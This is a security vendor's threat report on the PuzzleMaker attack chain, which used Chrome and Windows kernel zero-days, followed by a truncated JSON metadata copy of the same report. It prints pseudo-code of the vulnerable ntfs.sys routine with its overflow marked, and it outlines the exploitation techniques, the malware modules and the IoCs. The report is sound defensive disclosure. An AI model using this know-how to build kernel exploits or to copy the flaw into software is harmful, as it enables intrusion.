
On April 14-15, 2021, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges.
The elevation of privilege exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, 2021, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the elevation of privilege vulnerability. Both vulnerabilities were patched on June 8, 2021, as a part of the June Patch Tuesday.
## Remote code execution exploit
All of the observed attacks were conducted through Chrome browser. Unfortunately, we were unable to retrieve the JavaScript with full exploit code, but the timeframe of attacks and events preceding it led us to suspect one particular vulnerability.
On April 6-8, 2021 the Pwn2Own competition took place. This is a computer hacking contest where the Google Chrome web browser was one of the targets. According to the ZDI (Zero Day Initiative, the organizer of Pwn2Own) [website](<https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results>), one participating team was able to demonstrate a successful exploitation of the Chrome renderer process using a Typer Mismatch bug.
On April 12, 2021, the developers of Chromium committed two (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>), issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>)) Typer-related bug fixes to the open-source repository of V8 – a JavaScript engine used by Chrome and Chromium web browsers. One of these bug fixes (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>)) was intended to patch a vulnerability that was used during Pwn2Own, and both bug fixes were committed together with regression tests – JavaScript files to trigger these vulnerabilities. Later on the same day, a user with the Twitter handle @r4j0x00 published a working remote code execution exploit on GitHub, targeting an up-to-date version of Google Chrome. That exploit used a vulnerability from issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>) to execute a shellcode in the context of the browser renderer process.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122836/PuzzleMaker_attacks_01.png>)
**_Screenshot of tweet with Chrome zero-day published on April 12, 2021_**
The published exploit didn't contain a sandbox escape exploit and was therefore intended to work only when the browser was launched with the command line option _-no-sandbox_.
On April 13, 2021, Google released Chrome update 89.0.4389.128 for Windows, Mac and Linux with a fix for two vulnerabilities; CVE-2021-21220 (used during Pwn2Own) was one of them.
Some of our customers who were attacked on April 14-15, 2021, already had their Chrome browser updated to 89.0.4389.128, and that's why we think the attackers didn't use CVE-2021-21220 in their attacks.
On April 14, 2021, Google released Chrome update 90.0.4430.72 for Windows, Mac and Linux with a fix for 37 vulnerabilities. On the same day, a new Chrome exploit was presented to the public.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122912/PuzzleMaker_attacks_02.png>)
**_Screenshot of GitHub repository with Chrome zero-day published on April 14, 2021_**
This newly published exploit used a vulnerability from issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>), worked on the newly released Chrome 90.0.4430.72, and was fixed as CVE-2021-21224 only a few days later, on April 20, 2021.
We suspect the attackers were also able to use this JavaScript file with regression test to develop the exploit (or acquire it from someone else) and were probably using CVE-2021-21224 in their attacks.
## Elevation of privilege exploit
CVE-2021-31955 is an information disclosure vulnerability in ntoskrnl.exe. The vulnerability is affiliated with a Windows OS feature called SuperFetch. It was introduced in Windows Vista and is aimed to reduce software loading times by pre-loading commonly used applications into memory. For SuperFetch purposes the function _NtQuerySystemInformation_ implements a special system information class _SystemSuperfetchInformation_. This system information class incorporates more than a dozen of different SuperFetch information classes. The vulnerability lies in the fact that data returned by the _NtQuerySystemInformation_ function for the SuperFetch information class _SuperfetchPrivSourceQuery_ contains EPROCESS kernel addresses for currently executed processes.
It's noteworthy that this vulnerability can be observed in code that was available on [GitHub](<https://github.com/zodiacon/WindowsInternals/blob/master/MemInfo/MemInfo.cpp>) for a few years before we caught it in the wild and Microsoft patched it.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122949/PuzzleMaker_attacks_03.png>)
**_CVE-2021-31955 can be observed in the source code of the MemInfo utility_**
The other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function _NtfsQueryEaUserEaList_ processes a list of extended attributes for the file and stores the retrieved values to buffer. This function is accessible via _ntoskrnl_ syscall and among other things it's possible to control the size of the output buffer. If the size of the extended attribute is not aligned, the function will calculate a padding and the next extended attribute will be stored 32-bit aligned. The code checks if the output buffer is long enough to fit the extended attribute with padding, but it doesn't check for possible integer-underflow. As a result, a heap-based buffer overflow can happen.
for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry )
{
...
out_buf_pos = (DWORD *)(out_buf + padding + occupied_length);
if ( NtfsLocateEaByName(eas_blocks_for_file, eas_blocks_size, &name, &ea_block_pos) )
{
ea_block = eas_blocks_for_file + ea_block_pos;
ea_block_size = ea_block->DataLength + ea_block->NameLength + 9;
if ( ea_block_size <= out_buf_length - padding ) // integer-underflow is possible
{
memmove(out_buf_pos, (const void *)ea_block, ea_block_size); // heap buffer overflow
*out_buf_pos = 0;
}
}
else
{
...
}
...
occupied_length += ea_block_size + padding;
out_buf_length -= ea_block_size + padding;
padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;
...
}
**_Pseudo-code for vulnerable code in function NtfsQueryEaUserEaList_**
The exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.
As the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post exploitation technique to steal SYSTEM token. However, the exploit uses a rarely used "PreviousMode" technique instead. We have seen this technique used by the CHAINSHOT framework and even made a [presentation](<https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>) about it at CanSecWest/BlueHat in 2019. The exploit uses this technique to inject a malware module into the system process and execute it.
## Malware modules
Besides the aforementioned exploits, the full attack chain consists of four additional malware modules, which will be referred to as:
* Stager
* Dropper
* Service
* Remote shell
The stager module is used to notify that exploitation was successful. It also downloads and executes a more complex malware dropper module from a remote server. Each stager module is delivered to the victim with a personalized configuration blob that defines the C&C URL, Session ID, keys to decrypt the next stage of malware, and other information.
All the stager module samples that we've discovered so far were configured to use the same URL address – hxxps://p{removed}/metrika_upload/index.php – to download the encrypted malware dropper module.
We believe there is a chance that the remote code execution JavaScript exploit was also hosted on the same legitimate-looking geopolitical news portal, but we found no evidence of a classic watering hole attack. The victimology suggests a highly targeted delivery of exploits.
The dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack. We couldn't find any similarities between this and other known malware.
The remote shell module has a hardcoded URL of the C&C server inside (media-seoengine[.]com). All the communication between C&C server and client is authorized and encrypted. The remote shell module is able to download and upload files, create processes, sleep for specified amounts of time and delete itself from the compromised machine.
None of the artifacts we analyzed appear to have strong connections to any known threat actors. The only similarity to CHAINSHOT we observed is the "PreviousMode" technique, although this is publicly known and may be used by various groups. We are calling the threat actor behind these attacks PuzzleMaker.
Kaspersky products detect this exploit and malware modules with the verdicts:
* PDM:Exploit.Win32.Generic
* PDM:Trojan.Win32.Generic
* UDS:DangerousObject.Multi.Generic
Kaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected many zero-days, repeatedly proving their effectiveness. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.
More information about these attacks and the actor behind them is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports@kaspersky.com.
Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches.
## IoCs
media-seoengine[.]com
**%SYSTEM%\WmiPrvMon.exe**
MD5 [09A5055DB44FC1C9E3ADD608EFFF038C](<https://opentip.kaspersky.com/09A5055DB44FC1C9E3ADD608EFFF038C/>)
SHA-1 [BFFA4462901B74DBFBFFAA3A3DB27DAA61211412](<https://opentip.kaspersky.com/BFFA4462901B74DBFBFFAA3A3DB27DAA61211412/>)
SHA-256 [982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9](<https://opentip.kaspersky.com/982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9/>)
**%SYSTEM%\wmimon.dll**
MD5 [D6B850C950379D5EE0F254F7164833E8](<https://opentip.kaspersky.com/D6B850C950379D5EE0F254F7164833E8/>)
SHA-1 [E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B](<https://opentip.kaspersky.com/E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B/>)
SHA-256 [8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6](<https://opentip.kaspersky.com/8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6/>)
{"id": "SECURELIST:8E9198BF0E389572981DD1AA05D0708A", "type": "securelist", "bulletinFamily": "blog", "title": "PuzzleMaker attacks with Chrome zero-day exploit chain", "description": "\n\nOn April 14-15, 2021, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges.\n\nThe elevation of privilege exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, 2021, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the elevation of privilege vulnerability. Both vulnerabilities were patched on June 8, 2021, as a part of the June Patch Tuesday.\n\n## Remote code execution exploit\n\nAll of the observed attacks were conducted through Chrome browser. Unfortunately, we were unable to retrieve the JavaScript with full exploit code, but the timeframe of attacks and events preceding it led us to suspect one particular vulnerability.\n\nOn April 6-8, 2021 the Pwn2Own competition took place. This is a computer hacking contest where the Google Chrome web browser was one of the targets. According to the ZDI (Zero Day Initiative, the organizer of Pwn2Own) [website](<https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results>), one participating team was able to demonstrate a successful exploitation of the Chrome renderer process using a Typer Mismatch bug.\n\nOn April 12, 2021, the developers of Chromium committed two (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>), issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>)) Typer-related bug fixes to the open-source repository of V8 \u2013 a JavaScript engine used by Chrome and Chromium web browsers. One of these bug fixes (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>)) was intended to patch a vulnerability that was used during Pwn2Own, and both bug fixes were committed together with regression tests \u2013 JavaScript files to trigger these vulnerabilities. Later on the same day, a user with the Twitter handle @r4j0x00 published a working remote code execution exploit on GitHub, targeting an up-to-date version of Google Chrome. That exploit used a vulnerability from issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>) to execute a shellcode in the context of the browser renderer process.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122836/PuzzleMaker_attacks_01.png>)\n\n**_Screenshot of tweet with Chrome zero-day published on April 12, 2021_**\n\nThe published exploit didn't contain a sandbox escape exploit and was therefore intended to work only when the browser was launched with the command line option _-no-sandbox_.\n\nOn April 13, 2021, Google released Chrome update 89.0.4389.128 for Windows, Mac and Linux with a fix for two vulnerabilities; CVE-2021-21220 (used during Pwn2Own) was one of them.\n\nSome of our customers who were attacked on April 14-15, 2021, already had their Chrome browser updated to 89.0.4389.128, and that's why we think the attackers didn't use CVE-2021-21220 in their attacks.\n\nOn April 14, 2021, Google released Chrome update 90.0.4430.72 for Windows, Mac and Linux with a fix for 37 vulnerabilities. On the same day, a new Chrome exploit was presented to the public.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122912/PuzzleMaker_attacks_02.png>)\n\n**_Screenshot of GitHub repository with Chrome zero-day published on April 14, 2021_**\n\nThis newly published exploit used a vulnerability from issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>), worked on the newly released Chrome 90.0.4430.72, and was fixed as CVE-2021-21224 only a few days later, on April 20, 2021.\n\nWe suspect the attackers were also able to use this JavaScript file with regression test to develop the exploit (or acquire it from someone else) and were probably using CVE-2021-21224 in their attacks.\n\n## Elevation of privilege exploit\n\nCVE-2021-31955 is an information disclosure vulnerability in ntoskrnl.exe. The vulnerability is affiliated with a Windows OS feature called SuperFetch. It was introduced in Windows Vista and is aimed to reduce software loading times by pre-loading commonly used applications into memory. For SuperFetch purposes the function _NtQuerySystemInformation_ implements a special system information class _SystemSuperfetchInformation_. This system information class incorporates more than a dozen of different SuperFetch information classes. The vulnerability lies in the fact that data returned by the _NtQuerySystemInformation_ function for the SuperFetch information class _SuperfetchPrivSourceQuery_ contains EPROCESS kernel addresses for currently executed processes.\n\nIt's noteworthy that this vulnerability can be observed in code that was available on [GitHub](<https://github.com/zodiacon/WindowsInternals/blob/master/MemInfo/MemInfo.cpp>) for a few years before we caught it in the wild and Microsoft patched it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122949/PuzzleMaker_attacks_03.png>)\n\n**_CVE-2021-31955 can be observed in the source code of the MemInfo utility_**\n\nThe other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function _NtfsQueryEaUserEaList_ processes a list of extended attributes for the file and stores the retrieved values to buffer. This function is accessible via _ntoskrnl_ syscall and among other things it's possible to control the size of the output buffer. If the size of the extended attribute is not aligned, the function will calculate a padding and the next extended attribute will be stored 32-bit aligned. The code checks if the output buffer is long enough to fit the extended attribute with padding, but it doesn't check for possible integer-underflow. As a result, a heap-based buffer overflow can happen.\n \n \n for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry )\n {\n ...\n \n out_buf_pos = (DWORD *)(out_buf + padding + occupied_length);\n \n if ( NtfsLocateEaByName(eas_blocks_for_file, eas_blocks_size, &name, &ea_block_pos) )\n {\n \tea_block = eas_blocks_for_file + ea_block_pos;\n \tea_block_size = ea_block->DataLength + ea_block->NameLength + 9;\n \tif ( ea_block_size <= out_buf_length - padding ) // integer-underflow is possible\n \t{\n \tmemmove(out_buf_pos, (const void *)ea_block, ea_block_size); // heap buffer overflow\n \t*out_buf_pos = 0;\n \t}\n }\n else\n {\n \t...\n }\n \n ...\n \n occupied_length += ea_block_size + padding;\n out_buf_length -= ea_block_size + padding;\n padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;\n \n ...\n }\n\n**_Pseudo-code for vulnerable code in function NtfsQueryEaUserEaList_**\n\nThe exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.\n\nAs the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post exploitation technique to steal SYSTEM token. However, the exploit uses a rarely used "PreviousMode" technique instead. We have seen this technique used by the CHAINSHOT framework and even made a [presentation](<https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>) about it at CanSecWest/BlueHat in 2019. The exploit uses this technique to inject a malware module into the system process and execute it.\n\n## Malware modules\n\nBesides the aforementioned exploits, the full attack chain consists of four additional malware modules, which will be referred to as:\n\n * Stager\n * Dropper\n * Service\n * Remote shell\n\nThe stager module is used to notify that exploitation was successful. It also downloads and executes a more complex malware dropper module from a remote server. Each stager module is delivered to the victim with a personalized configuration blob that defines the C&C URL, Session ID, keys to decrypt the next stage of malware, and other information.\n\nAll the stager module samples that we've discovered so far were configured to use the same URL address \u2013 hxxps://p{removed}/metrika_upload/index.php \u2013 to download the encrypted malware dropper module.\n\nWe believe there is a chance that the remote code execution JavaScript exploit was also hosted on the same legitimate-looking geopolitical news portal, but we found no evidence of a classic watering hole attack. The victimology suggests a highly targeted delivery of exploits.\n\nThe dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack. We couldn't find any similarities between this and other known malware.\n\nThe remote shell module has a hardcoded URL of the C&C server inside (media-seoengine[.]com). All the communication between C&C server and client is authorized and encrypted. The remote shell module is able to download and upload files, create processes, sleep for specified amounts of time and delete itself from the compromised machine.\n\nNone of the artifacts we analyzed appear to have strong connections to any known threat actors. The only similarity to CHAINSHOT we observed is the "PreviousMode" technique, although this is publicly known and may be used by various groups. We are calling the threat actor behind these attacks PuzzleMaker.\n\nKaspersky products detect this exploit and malware modules with the verdicts:\n\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * UDS:DangerousObject.Multi.Generic\n\nKaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected many zero-days, repeatedly proving their effectiveness. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.\n\nMore information about these attacks and the actor behind them is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports@kaspersky.com.\n\nKaspersky would like to thank Microsoft for their prompt analysis of the report and patches.\n\n## IoCs\n\nmedia-seoengine[.]com\n\n**%SYSTEM%\\WmiPrvMon.exe**\n\nMD5 [09A5055DB44FC1C9E3ADD608EFFF038C](<https://opentip.kaspersky.com/09A5055DB44FC1C9E3ADD608EFFF038C/>) \nSHA-1 [BFFA4462901B74DBFBFFAA3A3DB27DAA61211412](<https://opentip.kaspersky.com/BFFA4462901B74DBFBFFAA3A3DB27DAA61211412/>) \nSHA-256 [982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9](<https://opentip.kaspersky.com/982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9/>)\n\n**%SYSTEM%\\wmimon.dll**\n\nMD5 [D6B850C950379D5EE0F254F7164833E8](<https://opentip.kaspersky.com/D6B850C950379D5EE0F254F7164833E8/>) \nSHA-1 [E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B](<https://opentip.kaspersky.com/E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B/>) \nSHA-256 [8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6](<https://opentip.kaspersky.com/8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6/>)", "published": "2021-06-08T17:32:30", "modified": "2021-06-08T17:32:30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/", "reporter": "Costin Raiu, Boris Larin, Alexey Kulaev", "references": [], "cvelist": ["CVE-2021-21220", "CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "immutableFields": [], "lastseen": "2021-06-15T08:32:02", "viewCount": 217, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-202104-5", "ASA-202104-7"]}, {"type": "attackerkb", "idList": ["AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C", "AKB:7E06EF37-046E-4E9E-AD5A-F4C2477ECB9E"]}, {"type": "avleonov", "idList": ["AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0276", "CPAI-2021-0316", "CPAI-2021-0318", "CPAI-2021-0952"]}, {"type": "chrome", "idList": ["GCSA-1247606144415232205", "GCSA-3185915322248637110"]}, {"type": "cve", "idList": ["CVE-2021-21220", "CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4906-1:4BE22"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21220", "DEBIANCVE:CVE-2021-21224"]}, {"type": "fedora", "idList": ["FEDORA:993DD30E4796", "FEDORA:B4C4A30D8539", "FEDORA:D63AA304E89C"]}, {"type": "freebsd", "idList": ["7C0D71A9-9D48-11EB-97A0-E09467587C17", "CB13A765-A277-11EB-97A0-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202104-08"]}, {"type": "githubexploit", "idList": ["399B15EF-A742-5722-86D2-59F3580C307B", "82A7AD32-D5F8-59E5-AC8B-6B99F9E33F64", "CAE25BF5-2DB9-5000-8FF9-CC2EAA626ECE", "FCD264DC-601D-5F11-BFEF-BB041077ABB8"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "kaspersky", "idList": ["KLA12136", "KLA12143", "KLA12147", "KLA12153", "KLA12183", "KLA12198", "KLA12202"]}, {"type": "krebs", "idList": ["KREBS:E374075CAB55D7AB06EBD73CB87D33CD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3322D6B92554507E3E44D06E2BA5E174", "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "MALWAREBYTES:6F90B6DD790D455EDED4BE326079DA35", "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21220", "MS:CVE-2021-21224", "MS:CVE-2021-31955", "MS:CVE-2021-31956"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4906.NASL", "FREEBSD_PKG_7C0D71A99D4811EB97A0E09467587C17.NASL", "FREEBSD_PKG_CB13A765A27711EB97A0E09467587C17.NASL", "GENTOO_GLSA-202104-08.NASL", "GOOGLE_CHROME_89_0_4389_128.NASL", "GOOGLE_CHROME_90_0_4430_85.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_128.NASL", "MACOSX_GOOGLE_CHROME_90_0_4430_85.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_77.NASL", "MICROSOFT_EDGE_CHROMIUM_90_0_818_46.NASL", "OPENSUSE-2021-567.NASL", "OPENSUSE-2021-629.NASL", "OPENSUSE-2021-712.NASL", "SMB_NT_MS21_JUN_5003635.NASL", "SMB_NT_MS21_JUN_5003637.NASL", "SMB_NT_MS21_JUN_5003638.NASL", "SMB_NT_MS21_JUN_5003646.NASL", "SMB_NT_MS21_JUN_5003681.NASL", "SMB_NT_MS21_JUN_5003687.NASL", "SMB_NT_MS21_JUN_5003694.NASL", "SMB_NT_MS21_JUN_5003695.NASL", "SMB_NT_MS21_JUN_5003697.NASL"]}, {"type": "osv", "idList": ["OSV:DSA-4906-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162437"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:1F59148E6615695438F94EF4956585AA", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08"]}, {"type": "seebug", "idList": ["SSV:99217"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0567-1", "OPENSUSE-SU-2021:0575-1", "OPENSUSE-SU-2021:0629-1", "OPENSUSE-SU-2021:0712-1"]}, {"type": "thn", "idList": ["THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:1DDE95EA33D4D9F304973569FC787451", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:6A9CD6F085628D08978727C0FF597535", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:B7217784F9D53002315C9C43CCC73766", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:F197A729A4F49F957F9D5910875EBAAA", "THN:FF8DAEC0AE0DDAE827D57407C51BE992"]}, {"type": "threatpost", "idList": ["THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21220", "UB:CVE-2021-21224"]}, {"type": "veracode", "idList": ["VERACODE:30066", "VERACODE:30147"]}, {"type": "zdi", "idList": ["ZDI-21-411"]}, {"type": "zdt", "idList": ["1337DAY-ID-36202"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-202104-5", "ASA-202104-7"]}, {"type": "attackerkb", "idList": ["AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C"]}, {"type": "avleonov", "idList": ["AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0276", "CPAI-2021-0316", "CPAI-2021-0318"]}, {"type": "chrome", "idList": ["GCSA-1247606144415232205", "GCSA-3185915322248637110"]}, {"type": "cve", "idList": ["CVE-2021-21220", "CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4906-1:4BE22"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21220", "DEBIANCVE:CVE-2021-21224"]}, {"type": "fedora", "idList": ["FEDORA:993DD30E4796", "FEDORA:B4C4A30D8539", "FEDORA:D63AA304E89C"]}, {"type": "freebsd", "idList": ["7C0D71A9-9D48-11EB-97A0-E09467587C17", "CB13A765-A277-11EB-97A0-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202104-08"]}, {"type": "githubexploit", "idList": ["399B15EF-A742-5722-86D2-59F3580C307B", "CAE25BF5-2DB9-5000-8FF9-CC2EAA626ECE", "FCD264DC-601D-5F11-BFEF-BB041077ABB8"]}, {"type": "kaspersky", "idList": ["KLA12136", "KLA12143", "KLA12147", "KLA12153", "KLA12183", "KLA12198", "KLA12202"]}, {"type": "krebs", "idList": ["KREBS:E374075CAB55D7AB06EBD73CB87D33CD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:6F90B6DD790D455EDED4BE326079DA35", "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21220", "MS:CVE-2021-21224", "MS:CVE-2021-31955", "MS:CVE-2021-31956"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4906.NASL", "FREEBSD_PKG_7C0D71A99D4811EB97A0E09467587C17.NASL", "FREEBSD_PKG_CB13A765A27711EB97A0E09467587C17.NASL", "GENTOO_GLSA-202104-08.NASL", "GOOGLE_CHROME_89_0_4389_128.NASL", "GOOGLE_CHROME_90_0_4430_85.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_128.NASL", "MACOSX_GOOGLE_CHROME_90_0_4430_85.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_77.NASL", "MICROSOFT_EDGE_CHROMIUM_90_0_818_46.NASL", "OPENSUSE-2021-567.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162437"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF"]}, {"type": "seebug", "idList": ["SSV:99217"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0567-1", "OPENSUSE-SU-2021:0575-1", "OPENSUSE-SU-2021:0629-1", "OPENSUSE-SU-2021:0712-1"]}, {"type": "thn", "idList": ["THN:1DDE95EA33D4D9F304973569FC787451", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:F197A729A4F49F957F9D5910875EBAAA", "THN:FF8DAEC0AE0DDAE827D57407C51BE992"]}, {"type": "threatpost", "idList": ["THREATPOST:61CC1EAC83030C2B053946454FE77AC3"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21220", "UB:CVE-2021-21224"]}, {"type": "zdi", "idList": ["ZDI-21-411"]}, {"type": "zdt", "idList": ["1337DAY-ID-36202"]}]}, "exploitation": null, "vulnersScore": -0.2}, "cvss2": {}, "cvss3": {}, 